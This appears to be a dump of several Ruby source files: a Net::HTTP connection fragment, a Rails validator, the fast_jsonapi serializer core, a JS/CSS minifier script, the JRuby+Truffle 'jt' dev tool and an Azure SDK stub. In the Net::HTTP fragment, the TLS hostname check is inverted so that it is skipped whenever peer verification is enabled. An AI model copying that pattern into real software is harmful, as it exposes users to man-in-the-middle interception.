        if @ssl_session and
          Process.clock_gettime(Process::CLOCK_REALTIME) < @ssl_session.time.to_f + @ssl_session.timeout
          s.session = @ssl_session
        end
        ssl_socket_connect(s, @open_timeout)
        # NOTE(review): stdlib runs post_connection_check unless verify_mode
        # is VERIFY_NONE; this copy inverts that to "unless VERIFY_PEER" —
        # presumably on purpose for the Habitat gateway, but worth confirming.
        if @ssl_context.verify_mode != OpenSSL::SSL::VERIFY_PEER
          s.post_connection_check(@address)
        end
        D "SSL established"
      end
      @socket = BufferedIO.new(s, read_timeout: @read_timeout,
                               continue_timeout: @continue_timeout,
                               debug_output: @debug_output)
      on_connect
    rescue => exception
      # Never leak the raw socket when any part of the handshake fails.
      if s
        D "Conn close because of connect error #{exception}"
        s.close
      end
      raise
    end
  end
end
| 37.315217 | 105 | 0.601806 |
4aa899354fed6cafd7cb0d288c577daeed38b377 | 438 | # frozen_string_literal: true
class AnswerForCorrectTemplateValidator < ActiveModel::Validator
  # Adds a validation error when the answered Question does not belong to
  # the same Template as the Answer's Plan.
  def validate(record)
    # Presence of plan/question is validated elsewhere; nothing to do here.
    return if record.plan.nil? || record.question.nil?
    # Matching templates are valid — no error to record.
    # BUG FIX: the guard was inverted (`return unless a == b` followed by
    # the error), which flagged answers whose question DID belong to the
    # correct template and silently accepted mismatched ones.
    return if record.plan.template == record.question.section.phase.template

    # errors.add is the supported API (errors[:attr] << msg is deprecated).
    record.errors.add(:question, I18n.t("helpers.answer.question_must_belong_to_correct_template"))
  end
end
| 31.285714 | 97 | 0.773973 |
abf1415027a0df96ca9d551f7bb1cf61a54efb90 | 7,655 | # frozen_string_literal: true
require 'active_support/concern'
require 'fast_jsonapi/multi_to_json'
module FastJsonapi
  # Raised when a record cannot supply the `id` required by the JSON:API spec.
  MandatoryField = Class.new(StandardError)

  # Core class-level serialization helpers mixed into every serializer via
  # ActiveSupport::Concern. All configuration lives in class attributes that
  # the serializer DSL populates (attributes, relationships, cache options).
  module SerializationCore
    extend ActiveSupport::Concern

    included do
      class << self
        # Serializer configuration, filled in by the DSL on each subclass.
        attr_accessor :attributes_to_serialize,
                      :relationships_to_serialize,
                      :cachable_relationships_to_serialize,
                      :uncachable_relationships_to_serialize,
                      :transform_method,
                      :record_type,
                      :record_id,
                      :cache_length,
                      :race_condition_ttl,
                      :cached,
                      :data_links
      end
    end

    class_methods do
      # Build a JSON:API resource-identifier hash {id:, type:}.
      # Returns nil for a blank id unless default_return is true, in which
      # case {id: nil, type: record_type} is returned instead.
      def id_hash(id, record_type, default_return=false)
        if id.present?
          { id: id.to_s, type: record_type }
        else
          default_return ? { id: nil, type: record_type } : nil
        end
      end

      # Map one id or a collection of ids to resource-identifier hashes.
      def ids_hash(ids, record_type)
        return ids.map { |id| id_hash(id, record_type) } if ids.respond_to? :map
        id_hash(ids, record_type) # ids variable is just a single id here
      end

      # Resource-identifier hash for a record whose type is derived from its
      # class name; record_types acts as a per-call memoization cache.
      def id_hash_from_record(record, record_types)
        # memoize the record type within the record_types dictionary, then assigning to record_type:
        record_type = record_types[record.class] ||= record.class.name.underscore.to_sym
        id_hash(record.id, record_type)
      end

      # Build the `data` payload for one relationship of `record`.
      # Non-polymorphic relationships use the configured :record_type;
      # polymorphic ones derive the type from each associated object's class.
      def ids_hash_from_record_and_relationship(record, relationship, params = {})
        polymorphic = relationship[:polymorphic]

        return ids_hash(
          fetch_id(record, relationship, params),
          relationship[:record_type]
        ) unless polymorphic

        return unless associated_object = fetch_associated_object(record, relationship, params)

        return associated_object.map do |object|
          id_hash_from_record object, polymorphic
        end if associated_object.respond_to? :map

        id_hash_from_record associated_object, polymorphic
      end

      # Evaluate the configured `links` for a record. A Proc of arity 1 gets
      # only the record; otherwise it also receives params. A symbol/string
      # is sent to the record as a method.
      def links_hash(record, params = {})
        data_links.each_with_object({}) do |(key, method), link_hash|
          link_hash[key] = if method.is_a?(Proc)
            method.arity == 1 ? method.call(record) : method.call(record, params)
          else
            record.public_send(method)
          end
        end
      end

      # Evaluate the configured attributes for a record; same Proc-vs-method
      # dispatch as links_hash.
      def attributes_hash(record, params = {})
        attributes_to_serialize.each_with_object({}) do |(key, method), attr_hash|
          attr_hash[key] = if method.is_a?(Proc)
            method.arity == 1 ? method.call(record) : method.call(record, params)
          else
            record.public_send(method)
          end
        end
      end

      # Build the `relationships` section. A has_many with no data serializes
      # as [], a to-one as nil, per the JSON:API spec.
      def relationships_hash(record, relationships = nil, params = {})
        relationships = relationships_to_serialize if relationships.nil?

        relationships.each_with_object({}) do |(_k, relationship), hash|
          name = relationship[:key]
          empty_case = relationship[:relationship_type] == :has_many ? [] : nil
          hash[name] = {
            data: ids_hash_from_record_and_relationship(record, relationship, params) || empty_case
          }
        end
      end

      # Serialize one record into a full JSON:API resource hash.
      # When caching is enabled, the cacheable portion (attributes, links and
      # cachable relationships) is stored in Rails.cache keyed by the record's
      # cache_key; uncachable relationships are merged in afterwards so they
      # are always fresh.
      def record_hash(record, params = {})
        if cached
          record_hash = Rails.cache.fetch(record.cache_key, expires_in: cache_length, race_condition_ttl: race_condition_ttl) do
            temp_hash = id_hash(id_from_record(record), record_type, true)
            temp_hash[:attributes] = attributes_hash(record, params) if attributes_to_serialize.present?
            temp_hash[:relationships] = {}
            temp_hash[:relationships] = relationships_hash(record, cachable_relationships_to_serialize, params) if cachable_relationships_to_serialize.present?
            temp_hash[:links] = links_hash(record, params) if data_links.present?
            temp_hash
          end
          record_hash[:relationships] = record_hash[:relationships].merge(relationships_hash(record, uncachable_relationships_to_serialize, params)) if uncachable_relationships_to_serialize.present?
          record_hash
        else
          record_hash = id_hash(id_from_record(record), record_type, true)
          record_hash[:attributes] = attributes_hash(record, params) if attributes_to_serialize.present?
          record_hash[:relationships] = relationships_hash(record, nil, params) if relationships_to_serialize.present?
          record_hash[:links] = links_hash(record, params) if data_links.present?
          record_hash
        end
      end

      # Resolve a record's id: a custom record_id method wins, otherwise #id.
      # Raises MandatoryField when the record has no id at all.
      def id_from_record(record)
        return record.send(record_id) if record_id
        raise MandatoryField, 'id is a mandatory field in the jsonapi spec' unless record.respond_to?(:id)
        record.id
      end

      # Override #to_json for alternative implementation
      def to_json(payload)
        FastJsonapi::MultiToJson.to_json(payload) if payload.present?
      end

      # Split a dotted include path ("a.b.c") into an array of symbols.
      def parse_include_item(include_item)
        return [include_item.to_sym] unless include_item.to_s.include?('.')
        include_item.to_s.split('.').map { |item| item.to_sym }
      end

      # For a nested include path, drop the first segment and re-join the
      # rest into a single dotted symbol; nil when nothing remains.
      def remaining_items(items)
        return unless items.size > 1

        items_copy = items.dup
        items_copy.delete_at(0)
        [items_copy.join('.').to_sym]
      end

      # includes handler
      # Walk the include paths and collect the serialized hashes of all
      # associated records, recursing into nested includes. Deduplication is
      # done via known_included_objects, keyed by type/class/id.
      def get_included_records(record, includes_list, known_included_objects, params = {})
        return unless includes_list.present?

        includes_list.sort.each_with_object([]) do |include_item, included_records|
          items = parse_include_item(include_item)
          items.each do |item|
            next unless relationships_to_serialize && relationships_to_serialize[item]
            record_type = @relationships_to_serialize[item][:record_type]
            serializer = @relationships_to_serialize[item][:serializer].to_s.constantize
            relationship_type = @relationships_to_serialize[item][:relationship_type]
            included_objects = fetch_associated_object(record, @relationships_to_serialize[item], params)
            next if included_objects.blank?
            included_objects = [included_objects] unless relationship_type == :has_many
            included_objects.each do |inc_obj|
              # Polymorphic relationships pick the serializer from the object's class.
              serializer = (inc_obj.class.to_s + "Serializer").constantize if @relationships_to_serialize[item][:polymorphic].is_a?(Hash)
              if remaining_items(items)
                serializer_records = serializer.get_included_records(inc_obj, remaining_items(items), known_included_objects)
                included_records.concat(serializer_records) unless serializer_records.empty?
              end

              code = "#{record_type}_#{inc_obj.class.to_s}_#{inc_obj.id}"
              next if known_included_objects.key?(code)

              known_included_objects[code] = inc_obj

              included_records << serializer.record_hash(inc_obj, params)
            end
          end
        end
      end

      # Load the associated object(s) for a relationship, preferring a
      # user-supplied block over the default association method.
      def fetch_associated_object(record, relationship, params)
        return relationship[:object_block].call(record, params) unless relationship[:object_block].nil?
        record.send(relationship[:object_method_name])
      end

      # Resolve the id(s) for a non-polymorphic relationship, preferring a
      # user-supplied block over the configured id method.
      def fetch_id(record, relationship, params)
        unless relationship[:object_block].nil?
          object = relationship[:object_block].call(record, params)

          return object.map(&:id) if object.respond_to? :map
          return object.id
        end

        record.public_send(relationship[:id_method_name])
      end
    end
  end
end
| 39.663212 | 198 | 0.655389 |
91ddc53574783462b11196dadf06664259ef588e | 74 | json.partial! "subcategoria/subcategorium", subcategorium: @subcategorium
| 37 | 73 | 0.837838 |
ff286f469a7dbf98d177c3abceacacda2e0493d3 | 1,897 | require 'fileutils'
require 'find'
GEM_ROOT = File.expand_path(File.join(File.dirname(__FILE__), '..'))
GOOGLE_JS_COMPRESSOR = File.join(GEM_ROOT, 'lib', 'google-compiler-20110615.jar')
YUI_JS_COMPRESSOR = File.join(GEM_ROOT, 'lib', 'yuicompressor-2.4.4.jar')
# Minify JavaScript source by piping it through an external compressor jar.
# `compressor` selects the tool: "google" (Closure) or anything else for YUI.
# Returns the minified output read back from the subprocess.
def compress_js(scripts, compressor)
  cmd = if compressor.downcase == "google"
    %Q/java -jar "#{GOOGLE_JS_COMPRESSOR}" --charset utf8/
  else
    %Q/java -jar "#{YUI_JS_COMPRESSOR}" --type js --charset utf8/
  end
  minified = ''
  IO.popen(cmd, 'r+') do |pipe|
    pipe.print(scripts)
    pipe.close_write
    minified = pipe.read
  end
  minified
end
# Minify CSS source by piping it through the YUI compressor jar.
# Returns the minified output read back from the subprocess.
def compress_css(src)
  cmd = %Q/java -jar "#{YUI_JS_COMPRESSOR}" --type css --charset utf8/
  minified = ''
  IO.popen(cmd, 'r+') do |pipe|
    pipe.print(src)
    pipe.close_write
    minified = pipe.read
  end
  minified
end
# Concatenate an array of file-content strings into one string.
#
# The previous implementation accumulated with `out += file`, which
# allocates a new string on every iteration (O(n^2) in total size);
# Array#join produces the identical result in one pass.
def concat_files(files)
  files.join
end
# Read every file matching the Rake FileList +pattern+ and join the
# contents with blank-line separators.
def all_files(pattern)
  FileList[pattern].map { |path| File.read(path) }.join("\n\n")
end
# Mirror a TinyMCE source tree into destDir, minifying CSS/HTM and JS files
# along the way and copying everything else verbatim. Every copied file is
# also recorded in `manifest` as a `javascript 'tiny_mce/...'` line.
#
# First pass recreates the directory structure; second pass processes files.
# NOTE(review): `entry[len, 255]` truncates relative paths longer than 255
# characters past the srcDir prefix — presumably never hit in practice, but
# worth confirming.
def handleTinyMCEDir(manifest, srcDir, destDir)
  len = srcDir.length
  actualDir = destDir
  FileUtils.mkdir_p(destDir)
  # Pass 1: replicate each subdirectory of srcDir under destDir.
  Find.find(srcDir) do |entry|
    if File.directory?(entry) and entry != srcDir and entry != actualDir
      actualDir = File.join(destDir, entry[len, 255])
      FileUtils.mkdir_p(actualDir)
    end
  end
  # Pass 2: minify or copy each file into the mirrored location.
  Find.find(srcDir) do |entry|
    if File.file?(entry)
      ending = entry[len, 255]
      # .htm files are run through the CSS compressor as well — intentional
      # per the original author, apparently to strip whitespace.
      if /\.css$/ =~ entry or /\.htm$/ =~ entry
        css = File.read entry
        open File.join(destDir, ending), 'w' do |f|
          f.write compress_css(css)
        end
      elsif /\.js$/ =~ entry
        js = File.read entry
        open File.join(destDir, ending), 'w' do |f|
          f.write compress_js(js, "yui")
        end
      else
        FileUtils.cp(entry, File.join(destDir, ending))
      end
      manifest.print "javascript 'tiny_mce/#{ending}'\n"
    end
  end
end
| 27.897059 | 81 | 0.637849 |
1a996af754060420b32ed70dfa61597824d2f767 | 15,621 | #!/usr/bin/env ruby
# Copyright (c) 2015 Oracle and/or its affiliates. All rights reserved. This
# code is released under a tri EPL/GPL/LGPL license. You can use it,
# redistribute it and/or modify it under the terms of the:
#
# Eclipse Public License version 1.0
# GNU General Public License version 2
# GNU Lesser General Public License version 2.1
# A workflow tool for JRuby+Truffle development
# Recommended: function jt { ruby tool/jt.rb "$@"; }
require 'fileutils'
require 'digest/sha1'
JRUBY_DIR = File.expand_path('../..', __FILE__)
JDEBUG_PORT = 51819
JDEBUG = "-J-agentlib:jdwp=transport=dt_socket,server=y,address=#{JDEBUG_PORT},suspend=y"
JEXCEPTION = "-Xtruffle.exceptions.print_java=true"
# wait for sub-processes to handle the interrupt
trap(:INT) {}
# Environment discovery helpers: locating GraalVM, mx, bench9000 and
# extracting version numbers from the source tree.
module Utilities

  # Extract the Truffle dependency version from truffle/pom.rb.
  # Returns the captured version string, or nil when no line matches
  # (File.foreach returns nil when the block never breaks).
  def self.graal_version
    File.foreach("#{JRUBY_DIR}/truffle/pom.rb") do |line|
      if /jar 'com.oracle:truffle:(\d+\.\d+(?:-SNAPSHOT)?)'/ =~ line
        break $1
      end
    end
  end

  # Find a GraalVM `java` executable: GRAAL_BIN, then a branch-specific
  # GRAAL_BIN_<BRANCH> variable, then conventional checkout locations
  # relative to the JRuby repository. Raises when none is executable.
  def self.find_graal
    graal_locations = [
      ENV['GRAAL_BIN'],
      ENV["GRAAL_BIN_#{mangle_for_env(git_branch)}"],
      "graalvm-jdk1.8.0/bin/java",
      "../graalvm-jdk1.8.0/bin/java",
      "../../graalvm-jdk1.8.0/bin/java",
    ].compact.map { |path| File.expand_path(path, JRUBY_DIR) }

    not_found = -> {
      raise "couldn't find graal - download it from http://lafo.ssw.uni-linz.ac.at/graalvm/ and extract it into the JRuby repository or parent directory"
    }

    graal_locations.find(not_found) do |location|
      File.executable?(location)
    end
  end

  # Current git branch name, memoized for the life of the process.
  def self.git_branch
    @git_branch ||= `git rev-parse --abbrev-ref HEAD`.strip
  end

  # Turn a branch name into an environment-variable-safe suffix
  # (e.g. "truffle-head" -> "TRUFFLE_HEAD").
  def self.mangle_for_env(name)
    name.upcase.tr('-', '_')
  end

  # Locate the mx.sh tool relative to the Graal java binary; only works
  # against a source checkout of Graal, not a binary distribution.
  def self.find_graal_mx
    mx = File.expand_path('../../../../mx.sh', find_graal)
    raise "couldn't find mx.sh - set GRAAL_BIN, and you need to use a checkout of Graal, not a build" unless File.executable?(mx)
    mx
  end

  # True when an IGV (Ideal Graph Visualizer) process is already running.
  def self.igv_running?
    `ps a`.lines.any? { |p| p.include? 'mxtool/mx.py igv' }
  end

  # Start IGV in its own process group if it isn't running, then wait for
  # the user to confirm the window appeared (first start can be slow).
  def self.ensure_igv_running
    unless igv_running?
      spawn "#{find_graal_mx} igv", pgroup: true
      sleep 5
      puts
      puts
      puts "-------------"
      puts "Waiting for IGV start"
      puts "The first time you run IGV it may take several minutes to download dependencies and compile"
      puts "Press enter when you see the IGV window"
      puts "-------------"
      puts
      puts
      $stdin.gets
    end
  end

  # Locate a bench9000 checkout: BENCH_DIR, then conventional locations
  # relative to the JRuby repository. Raises when none exists.
  def self.find_bench
    bench_locations = [
      ENV['BENCH_DIR'],
      'bench9000',
      '../bench9000'
    ].compact.map { |path| File.expand_path(path, JRUBY_DIR) }

    not_found = -> {
      raise "couldn't find bench9000 - clone it from https://github.com/jruby/bench9000.git into the JRuby repository or parent directory"
    }

    bench_locations.find(not_found) do |location|
      Dir.exist?(location)
    end
  end

  # The JRuby version string from the VERSION file.
  def self.jruby_version
    File.read("#{JRUBY_DIR}/VERSION").strip
  end
end
# Subprocess helpers shared by all commands: echo the command line, run it,
# and abort with the child's exit status on failure.
module ShellUtils
  private

  # Run a command (optionally with a leading env hash, as accepted by
  # Kernel#system), echoing it first. Exits the whole tool with the child's
  # exit status when the command fails.
  def raw_sh(*args)
    puts "$ #{printable_cmd(args)}"
    result = system(*args)
    unless result
      $stderr.puts "FAILED (#{$?}): #{printable_cmd(args)}"
      exit $?.exitstatus
    end
  end

  # Render an argv (with optional leading env hash) as a copy-pasteable
  # shell line for display purposes only.
  def printable_cmd(args)
    env = {}
    if Hash === args.first
      env, *args = args
    end
    env = env.map { |k,v| "#{k}=#{shellescape(v)}" }.join(' ')
    args = args.map { |a| shellescape(a) }.join(' ')
    env.empty? ? args : "#{env} #{args}"
  end

  # Quote a single argument for display. Plain strings pass through,
  # space-containing strings get single quotes, and strings with both
  # spaces and single quotes fall back to Shellwords.
  # NOTE(review): strings without spaces are never escaped even if they
  # contain other shell metacharacters ($, *, ;) — acceptable here because
  # the output is only printed, never executed, but worth confirming.
  def shellescape(str)
    if str.include?(' ')
      if str.include?("'")
        require 'shellwords'
        Shellwords.escape(str)
      else
        "'#{str}'"
      end
    else
      str
    end
  end

  # raw_sh with the working directory pinned to the JRuby checkout.
  def sh(*args)
    Dir.chdir(JRUBY_DIR) do
      raw_sh(*args)
    end
  end

  # Run the Maven wrapper from the JRuby checkout.
  def mvn(*args)
    sh './mvnw', *args
  end

  # Run mspec with the Truffle config. Accepts an optional leading env
  # hash; adds the Eclipse target flag when JRUBY_ECLIPSE is set.
  def mspec(command, *args)
    env_vars = {}
    if command.is_a?(Hash)
      env_vars = command
      command, *args = args
    end

    if ENV["JRUBY_ECLIPSE"] == "true"
      args.unshift "-ttool/jruby_eclipse"
    end

    sh env_vars, 'ruby', 'spec/mspec/bin/mspec', command, '--config', 'spec/truffle/truffle.mspec', *args
  end
end
# All user-facing jt subcommands. Each public method is dispatched by name
# from JT#main; private methods are internal helpers that must not be
# callable as commands.
#
# Fix: `install`'s else branch raised `ArgumentError, kind` where `kind` is
# an undefined local — any unrecognized argument produced a NameError
# instead of the intended ArgumentError. It now raises with `arg`.
module Commands
  include ShellUtils

  # Print usage information for every supported subcommand.
  def help
    puts 'jt build                                       build'
    puts 'jt build truffle                               build only the Truffle part, assumes the rest is up-to-date'
    puts 'jt clean                                       clean'
    puts 'jt irb                                         irb'
    puts 'jt rebuild                                     clean and build'
    puts 'jt run [options] args...                       run JRuby with -X+T and args'
    puts '    --graal         use Graal (set GRAAL_BIN or it will try to automagically find it)'
    puts '    --asm           show assembly (implies --graal)'
    puts '    --server        run an instrumentation server on port 8080'
    puts '    --igv           make sure IGV is running and dump Graal graphs after partial escape (implies --graal)'
    puts '    --jdebug        run a JDWP debug server on 8000'
    puts '    --jexception[s] print java exceptions'
    puts 'jt e 14 + 2                                    evaluate an expression'
    puts 'jt puts 14 + 2                                 evaluate and print an expression'
    puts 'jt test                                        run all mri tests and specs'
    puts 'jt test mri                                    run mri tests'
    puts 'jt test specs                                  run all specs'
    puts 'jt test specs fast                             run all specs except sub-processes, GC, sleep, ...'
    puts 'jt test spec/ruby/language                     run specs in this directory'
    puts 'jt test spec/ruby/language/while_spec.rb       run specs in this file'
    puts 'jt test pe                                     run partial evaluation tests'
    puts 'jt tag spec/ruby/language                      tag failing specs in this directory'
    puts 'jt tag spec/ruby/language/while_spec.rb        tag failing specs in this file'
    puts 'jt tag all spec/ruby/language                  tag all specs in this file, without running them'
    puts 'jt untag spec/ruby/language                    untag passing specs in this directory'
    puts 'jt untag spec/ruby/language/while_spec.rb      untag passing specs in this file'
    puts 'jt bench debug [--ruby-backtrace] benchmark    run a single benchmark with options for compiler debugging'
    puts 'jt bench reference [benchmarks]                run a set of benchmarks and record a reference point'
    puts 'jt bench compare [benchmarks]                  run a set of benchmarks and compare against a reference point'
    puts '    benchmarks can be any benchmarks or group of benchmarks supported'
    puts '    by bench9000, eg all, classic, chunky, 3, 5, 10, 15 - default is 5'
    puts 'jt findbugs                                    run findbugs'
    puts 'jt findbugs report                             run findbugs and generate an HTML report'
    puts 'jt install ..../graal/mx/suite.py              install a JRuby distribution into an mx suite'
    puts
    puts 'you can also put build or rebuild in front of any command'
    puts
    puts 'recognised environment variables:'
    puts
    puts '  GRAAL_BIN                                    GraalVM executable (java command) to use'
    puts '  GRAAL_BIN_...git_branch_name...              GraalVM executable to use for a given branch'
    puts '           branch names are mangled - eg truffle-head becomes GRAAL_BIN_TRUFFLE_HEAD'
  end

  # Build everything (no argument) or only the Truffle module.
  # Raises ArgumentError for any other project name.
  def build(project = nil)
    case project
    when 'truffle'
      mvn '-pl', 'truffle', 'package'
    when nil
      mvn 'package'
    else
      raise ArgumentError, project
    end
  end

  # Remove all build output.
  def clean
    mvn 'clean'
  end

  # Start an interactive irb session under Truffle-mode JRuby.
  def irb(*args)
    run(*%w[-S irb], *args)
  end

  # Clean then build from scratch.
  def rebuild
    clean
    build
  end

  # Run JRuby in Truffle mode. Recognizes and strips the jt-specific
  # options documented in #help (--graal, --asm, --igv, --jdebug,
  # --jexception[s], --server); everything else is passed through.
  # An optional leading hash supplies extra environment variables.
  def run(*args)
    env_vars = args.first.is_a?(Hash) ? args.shift : {}
    jruby_args = %w[-X+T -Xtruffle.core.load_path=truffle/src/main/ruby]

    # Options that imply --graal.
    { '--asm' => '--graal', '--igv' => '--graal' }.each_pair do |arg, dep|
      args.unshift dep if args.include?(arg)
    end

    if args.delete('--graal')
      env_vars["JAVACMD"] = Utilities.find_graal
      jruby_args << '-J-server'
    end

    if args.delete('--asm')
      jruby_args += %w[-J-XX:+UnlockDiagnosticVMOptions -J-XX:CompileCommand=print,*::callRoot]
    end

    if args.delete('--jdebug')
      jruby_args << JDEBUG
    end

    if args.delete('--jexception') || args.delete('--jexceptions')
      jruby_args << JEXCEPTION
    end

    if args.delete('--server')
      jruby_args += %w[-Xtruffle.instrumentation_server_port=8080 -Xtruffle.passalot=1]
    end

    if args.delete('--igv')
      warn "warning: --igv might not work on master - if it does not, use truffle-head instead which builds against latest graal" if Utilities.git_branch == 'master'
      Utilities.ensure_igv_running
      jruby_args += %w[-J-G:Dump=TrufflePartialEscape]
    end

    if ENV["JRUBY_ECLIPSE"] == "true"
      jruby_bin = "#{JRUBY_DIR}/tool/jruby_eclipse"
    else
      jruby_bin = "#{JRUBY_DIR}/bin/jruby"
    end

    raw_sh env_vars, jruby_bin, *jruby_args, *args
  end
  alias ruby run

  # Evaluate a Ruby expression under Truffle-mode JRuby.
  def e(*args)
    run '-e', args.join(' ')
  end

  # `jt puts expr` — evaluate and print. Dispatched via the command_ prefix
  # so it doesn't shadow Kernel#puts.
  def command_puts(*args)
    e 'puts begin', *args, 'end'
  end

  # `jt p expr` — evaluate and inspect-print.
  def command_p(*args)
    e 'p begin', *args, 'end'
  end

  # Run the MRI test suite (or a subset) with the Truffle exclude list.
  def test_mri(*args)
    env_vars = {
      "EXCLUDES" => "test/mri/excludes_truffle"
    }
    jruby_args = %w[-J-Xmx2G -Xtruffle.exceptions.print_java]

    if args.empty?
      args = File.readlines("#{JRUBY_DIR}/test/mri_truffle.index").grep(/^[^#]\w+/).map(&:chomp)
    end

    command = %w[test/mri/runner.rb -v --color=never --tty=no -q]
    run(env_vars, *jruby_args, *command, *args)
  end
  private :test_mri

  # Dispatch `jt test ...`: no args runs everything, a keyword selects a
  # suite, and a path is routed to MRI tests or specs by location.
  def test(*args)
    path, *rest = args

    case path
    when nil
      test_specs
      test_mri
    when 'pe' then test_pe(*rest)
    when 'specs' then test_specs(*rest)
    when 'mri' then test_mri(*rest)
    else
      if File.expand_path(path).start_with?("#{JRUBY_DIR}/test")
        test_mri(*args)
      else
        test_specs(*args)
      end
    end
  end

  # Run the partial-evaluation tests (requires Graal).
  def test_pe(*args)
    run('--graal', *args, 'test/truffle/pe/pe.rb')
  end
  private :test_pe

  # Run ruby/spec via mspec, excluding specs tagged as failing.
  # `fast` additionally excludes slow-tagged specs.
  def test_specs(*args)
    env_vars = {}
    options = %w[--excl-tag fails]

    if args.first == 'fast'
      args.shift
      options += %w[--excl-tag slow]
    end

    if args.delete('--graal')
      env_vars["JAVACMD"] = Utilities.find_graal
      options << '-T-J-server'
    end

    if args.delete('--jdebug')
      options << "-T#{JDEBUG}"
    end

    if args.delete('--jexception') || args.delete('--jexceptions')
      options << "-T#{JEXCEPTION}"
    end

    mspec env_vars, 'run', *options, *args
  end
  private :test_specs

  # Tag the failing specs at `path`; `jt tag all path` tags every spec
  # without running them.
  def tag(path, *args)
    return tag_all(*args) if path == 'all'
    mspec 'tag', '--add', 'fails', '--fail', path, *args
  end

  # Add tags to all given examples without running them. Useful to avoid file exclusions.
  def tag_all(*args)
    mspec 'tag', *%w[--unguarded --all --dry-run --add fails], *args
  end
  private :tag_all

  # Remove the `fails` tag from specs that now pass.
  def untag(path, *args)
    puts
    puts "WARNING: untag is currently not very reliable - run `jt test #{[path,*args] * ' '}` after and manually annotate any new failures"
    puts
    mspec 'tag', '--del', 'fails', '--pass', path, *args
  end

  # Run bench9000: `debug` for a single benchmark with compiler diagnostics,
  # `reference`/`compare` for recording and comparing benchmark sets.
  def bench(command, *args)
    bench_dir = Utilities.find_bench
    env_vars = {
      "JRUBY_9000_DEV_DIR" => JRUBY_DIR,
      "GRAAL_BIN" => Utilities.find_graal,
    }
    bench_args = ["-I#{bench_dir}/lib", "#{bench_dir}/bin/bench"]
    case command
    when 'debug'
      if args.delete '--ruby-backtrace'
        compilation_exceptions_behaviour = "-J-G:+TruffleCompilationExceptionsAreThrown"
      else
        compilation_exceptions_behaviour = "-J-G:+TruffleCompilationExceptionsAreFatal"
      end
      env_vars = env_vars.merge({'JRUBY_OPTS' => "-J-G:+TraceTruffleCompilation -J-G:+DumpOnError -J-G:-GraphPE #{compilation_exceptions_behaviour}"})
      bench_args += ['score', 'jruby-9000-dev-truffle-graal', '--show-commands', '--show-samples']
      raise 'specify a single benchmark for run - eg classic-fannkuch-redux' if args.size != 1
    when 'reference'
      bench_args += ['reference', 'jruby-9000-dev-truffle-graal', '--show-commands']
      args << "5" if args.empty?
    when 'compare'
      bench_args += ['compare-reference', 'jruby-9000-dev-truffle-graal']
      args << "5" if args.empty?
    else
      raise ArgumentError, command
    end
    raw_sh env_vars, "ruby", *bench_args, *args
  end

  # Run findbugs; `report` additionally generates and opens an HTML report.
  def findbugs(report=nil)
    case report
    when 'report'
      sh 'tool/truffle-findbugs.sh', '--report'
      sh 'open', 'truffle-findbugs-report.html'
    when nil
      sh 'tool/truffle-findbugs.sh'
    else
      raise ArgumentError, report
    end
  end

  # Temporarily rewrite truffle/pom.rb to compile with Java 8 `-parameters`,
  # rebuild Truffle, and run with ambiguous-optional-argument checking on.
  def check_ambiguous_arguments
    ENV.delete "JRUBY_ECLIPSE" # never run from the Eclipse launcher here
    pom = "#{JRUBY_DIR}/truffle/pom.rb"
    contents = File.read(pom)
    # Switch source/target from 1.7 to 1.8 and force forked compilation.
    contents.gsub!(/^(\s+)'source'\s*=>.+'1.7'.+,\n\s+'target'\s*=>.+\s*'1.7.+,\n/) do
      indent = $1
      $&.gsub("1.7", "1.8") + "#{indent}'fork' => 'true',\n"
    end
    # Add the -parameters compiler flag if not already present.
    contents.sub!(/^(\s+)('-J-Dfile.encoding=UTF-8')(.+\n)(?!\1'-parameters')/) do
      "#{$1}#{$2},\n#{$1}'-parameters'#{$3}"
    end
    File.write pom, contents
    FileUtils::Verbose.rm_r "#{JRUBY_DIR}/truffle/target/classes"
    build('truffle')
    run({ "TRUFFLE_CHECK_AMBIGUOUS_OPTIONAL_ARGS" => "true" }, '-e', 'exit')
  end

  # Install JRuby jars into an mx suite: rebuilds, copies sha1-stamped jars
  # into the suite's lib directory and patches suite.py to reference them.
  # Raises ArgumentError unless the argument looks like a suite.py path.
  def install(arg)
    case arg
    when /.*suite.*\.py$/
      rebuild
      mvn '-Pcomplete'

      suite_file = arg
      suite_lines = File.readlines(suite_file)
      version = Utilities.jruby_version

      [
        ['maven/jruby-complete/target', "jruby-complete"],
        ['truffle/target', "jruby-truffle"]
      ].each do |dir, name|
        jar_name = "#{name}-#{version}.jar"
        source_jar_path = "#{dir}/#{jar_name}"
        shasum = Digest::SHA1.hexdigest File.read(source_jar_path)
        jar_shasum_name = "#{name}-#{version}-#{shasum}.jar"
        FileUtils.cp source_jar_path, "#{File.expand_path('../..', suite_file)}/lib/#{jar_shasum_name}"
        line_index = suite_lines.find_index { |line| line.start_with? "      \"path\" : \"lib/#{name}" }
        suite_lines[line_index] = "      \"path\" : \"lib/#{jar_shasum_name}\",\n"
        suite_lines[line_index + 1] = "      \#\"urls\" : [\"http://lafo.ssw.uni-linz.ac.at/truffle/ruby/#{jar_shasum_name}\"],\n"
        suite_lines[line_index + 2] = "      \"sha1\" : \"#{shasum}\"\n"
      end

      File.write(suite_file, suite_lines.join())
    else
      # Was `raise ArgumentError, kind` — `kind` is undefined here and
      # produced a NameError instead of the intended ArgumentError.
      raise ArgumentError, arg
    end
  end
end
# Command-line driver: parses ARGV and dispatches to Commands methods.
class JT
  include Commands

  # Interpret the argument vector: show help when empty or asked for,
  # honour a leading build/rebuild prefix, then dispatch the remaining
  # command name (p/puts are namespaced as command_*) with its arguments.
  def main(args)
    argv = args.dup

    if argv.empty? || %w[-h -help --help].include?(argv.first)
      help
      exit
    end

    # A leading build/rebuild runs before any further command.
    case argv.first
    when "rebuild"
      send(argv.shift)
    when "build"
      build_call = [argv.shift]
      build_call << argv.shift if argv.first == "truffle"
      send(*build_call)
    end

    return if argv.empty?

    known_commands = Commands.public_instance_methods(false).map(&:to_s)

    name, *rest = argv
    name = "command_#{name}" if %w[p puts].include?(name)

    abort "no command matched #{name.inspect}" unless known_commands.include?(name)

    begin
      send(name, *rest)
    rescue
      puts "Error during command: #{argv*' '}"
      raise $!
    end
  end
end
JT.new.main(ARGV)
| 30.450292 | 165 | 0.601434 |
28245c41ee1ee6b97c5d2e11950210250fcf599b | 40,148 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure::Network::Mgmt::V2018_11_01
#
# PublicIPPrefixes
#
class PublicIPPrefixes
include MsRestAzure
#
# Creates and initializes a new instance of the PublicIPPrefixes class.
# @param client service class for accessing basic functionality.
#
def initialize(client)
@client = client
end
# @return [NetworkManagementClient] reference to the NetworkManagementClient
